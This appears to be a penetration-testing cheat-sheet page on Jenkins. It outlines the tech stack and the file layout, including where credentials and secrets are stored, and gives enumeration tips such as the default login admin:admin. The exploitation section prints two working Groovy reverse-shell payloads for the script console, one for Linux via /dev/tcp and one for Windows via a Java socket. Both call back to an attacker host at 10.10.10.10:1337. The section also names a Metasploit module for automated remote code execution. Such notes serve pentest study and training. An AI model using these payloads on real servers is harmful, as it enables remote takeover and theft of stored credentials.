Skip to main content

Jenkins

Jenkins is an open-source automation server used for continuous integration (CI) and continuous deployment (CD). It automates building, testing, and deploying applications, making it essential for DevOps workflows. Jenkins supports a wide range of plugins for integrating with different tools and services.

Tech Stack of Jenkins

  • Backend: Java (runs on Java Virtual Machine)
  • Frontend: HTML, CSS, JavaScript (UI-based management)
  • Database: Uses built-in storage (can be configured with MySQL, PostgreSQL, etc.)
  • Server: Jenkins (self-contained), can be run on Apache Tomcat or as a standalone service

File Structure

/jenkins-root
│── bin/               # Executable scripts for starting/stopping Jenkins  
│   ├── jenkins.sh     # Script to start Jenkins (Linux/macOS)  
│   ├── jenkins.bat    # Windows script to start Jenkins  
│── config/            # Configuration files for Jenkins  
│   ├── jenkins.xml    # Main Jenkins configuration (when running as a service)  
│   ├── config.xml     # Global Jenkins settings  
│   ├── credentials.xml # Stores Jenkins credentials (hashed)  
│   ├── nodeMonitors.xml # Configuration for Jenkins node monitoring  
│   ├── updates/       # Stores update-related data  
│── logs/              # Log files for Jenkins runtime (jenkins.log, access.log, etc.)  
│── plugins/           # Installed plugins (JAR files for added functionality)  
│── jobs/              # Jenkins job configurations  
│   ├── <job-name>/    # Each job has its own directory  
│   │   ├── config.xml # Job-specific settings  
│   │   ├── builds/    # Build history for the job  
│   │   ├── workspace/ # Workspace used for builds  
│── users/             # User-related configuration files  
│   ├── <username>/    # Each user has a separate directory  
│   │   ├── config.xml # User-specific settings  
│── secrets/           # Stores sensitive information like API tokens  
│   ├── master.key     # Encryption key for secrets  
│   ├── hudson.util.Secret # Encrypted secrets file  
│── war/               # Jenkins WAR file (if running standalone)  
│── workspace/         # Default workspace for builds  
│── LICENSE            # Jenkins license file  
│── README.md          # Basic information about Jenkins
tip

Jenkins is commonly hosted on Windows servers, running as the SYSTEM account.

Enumeration

  • The login page says "Welcome to Jenkins."
  • Default credentials are admin:admin.
  • Once logged in, we can find the Jenkins version in footer.

Exploitation

RCE with Groovy Script

  • Visit http://site.rezydev.xyz:8080/script
  • Here we will upload our reverse-shell Apache Groovy script

Jenkins in Linux

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.10.10.10/1337;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Jenkins in Windows

String host="10.10.10.10";
int port=1337;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Automated RCE with Metasploit

  • Use the module exploit/multi/http/jenkins_script_console from Metasploit for automated RCE.
  • Metasploit automates the process, making it easier to exploit.
  • This will give us a Meterpreter shell, which is powerful and offers advanced functionality.